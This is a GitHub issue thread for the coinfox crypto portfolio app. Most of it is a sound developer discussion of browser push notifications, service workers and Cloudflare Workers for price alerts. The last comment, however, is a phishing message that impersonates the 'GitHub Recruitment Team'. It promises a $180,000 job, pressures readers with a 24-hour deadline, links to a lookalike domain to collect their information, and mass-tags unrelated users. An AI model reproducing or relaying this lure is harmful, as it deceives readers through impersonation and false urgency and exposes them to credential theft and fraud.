### ISSUE TITLE
Price notifications 

### ISSUE THREAD

**Issue by vinniejames** [vinniejames/coinfox#28]
Add price hi/low notifications

**Comment by vinniejames** [comment]
@williamluke4 I'm most interested in getting this one going. Adding browser notifications / push alerts for pricing

**Comment by williamluke4** [comment]
@vinniejames Will have look in to [service workers](https://developers.google.com/web/fundamentals/codelabs/push-notifications/)

**Comment by vinniejames** [comment]
Yes, exactly, @williamluke4 ! Would you be interested in doing a bit of research here and/or submitting a PR? 

Ideally, I'd like users to be able to select an upper/lower bound to receive an alert, eg Ethereum price: ping when price drops below $500 or above $1500

**Comment by williamluke4** [comment]
Yeah shouldn't be too hard!

**Comment by williamluke4** [comment]
@vinniejames Well I was wrong! This would require a backend server to send push notification to the app.

**Comment by vinniejames** [comment]
Setting up a server wouldn't be out of the question. I wonder if it could be accomplished instead using something like this: https://blog.cloudflare.com/cloudflare-workers-unleashed/amp/

**Comment by williamluke4** [comment]
@vinniejames Yeah that would work!  Just quickly setup serviceworker push notification in a separate branch!

**Comment by vinniejames** [comment]
Nice, let me know if you make some progress implementing the serviceWorker! 

Looks like periodicSync  wont work on Safari, so if you want to try that route please make sure there is a fallback for Safari users

**Comment by apocanow1** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
mattwang44, @jordicasesnoves, @StraykerPL, @DeSireFire, @dwcost, @12520054, @orenovadia, @lxq2537664558, @cryptmarcus, @Giando, @danieldanielecki, @wenting-zhao, @suraj-kumar-adhikari, @elohffa, @theill, @srhugotorres, @eagerashwani, @privatizer, @iwarner, @kagami-c
